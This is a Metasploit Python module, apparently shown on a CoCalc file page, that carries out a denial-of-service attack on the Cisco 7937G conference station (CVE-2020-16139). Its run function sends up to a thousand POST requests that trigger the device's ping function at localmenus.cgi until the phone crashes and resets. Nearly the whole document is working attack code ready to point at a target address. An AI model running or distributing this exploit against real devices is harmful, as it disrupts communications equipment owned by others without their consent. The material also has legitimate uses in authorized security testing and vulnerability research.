CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3

4
# standard modules
5
from metasploit import module
6
import logging
7

8
# extra modules
9
requests_missing = False
10
random_missing = False
11
string_missing = False
12

13
try:
14
    import requests
15
except ImportError:
16
    requests_missing = True
17
try:
18
    import random
19
except ImportError:
20
    random_missing = True
21
try:
22
    import string
23
except ImportError:
24
    string_missing = True
25

26
metadata = {
27
    'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
28
    'description': '''
29
	This module exploits a bug in how the conference station handles 
30
	executing a ping via its web interface. By repeatedly executing 
31
	the ping function without clearing out the resulting output, 
32
	a DoS is caused that will reset the device after a few minutes.
33
    ''',
34
    'authors': [
35
        'Cody Martin'
36
	# Author Homepage: debifrank.github.io
37
	# Organization: BlackLanternSecurity
38
	# Org. Homepage: BlackLanternSecurity.com
39
    ],
40
    'date': '2020-06-02',
41
    'license': 'GPL_LICENSE',
42
    'references': [
43
        {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
44
        {'type': 'cve', 'ref': '2020-16139'}
45
    ],
46
    'type': 'dos',
47
    'options': {
48
        'rhost': {'type': 'address', 
49
		  'description': 'Target address', 
50
		  'required': True, 
51
		  'default': 'None'}
52
    }
53
}
54

55
def run(args):
56
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
57
    if requests_missing:
58
        logging.error('Required Python module dependency (requests) is missing.')
59
        logging.error('Please execute pip3 install requests.')
60
        return
61
    if random_missing:
62
        logging.error('Required Python module dependency (random) is missing.')
63
        logging.error('Please execute pip3 install random.')
64
    if string_missing:
65
        logging.error('Required Python module dependency (string) is missing.')
66
        logging.error('Please execute pip3 install string.')
67

68
    url = "http://{}/localmenus.cgi".format(args['rhost'])
69
    data = ''.join(random.choice(string.ascii_letters) for i in range(46))
70
    payload = {"func": "609", "data": data, "rphl": "1"}
71
    logging.info("Sending POST requests triggering the PING function.")
72
    logging.info("Device should crash with a DoS shortly...")
73
    for i in range(1000):
74
        try:
75
            r = requests.post(url=url, params=payload, timeout=5)
76
            if r.status_code != 200:
77
                logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78
                return
79
        except requests.exceptions.ReadTimeout as e:
80
            logging.info('DoS reset attack completed!')
81
            return
82
        except requests.exceptions.RequestException as e:
83
            logging.info('An unexpected exception occurred: ' + str(e))
84
            logging.info('The device may be DoS\'d already or not have web access enabled.')
85
            return
86

87

88
if __name__ == '__main__':
89
    module.run(metadata, run)
90

91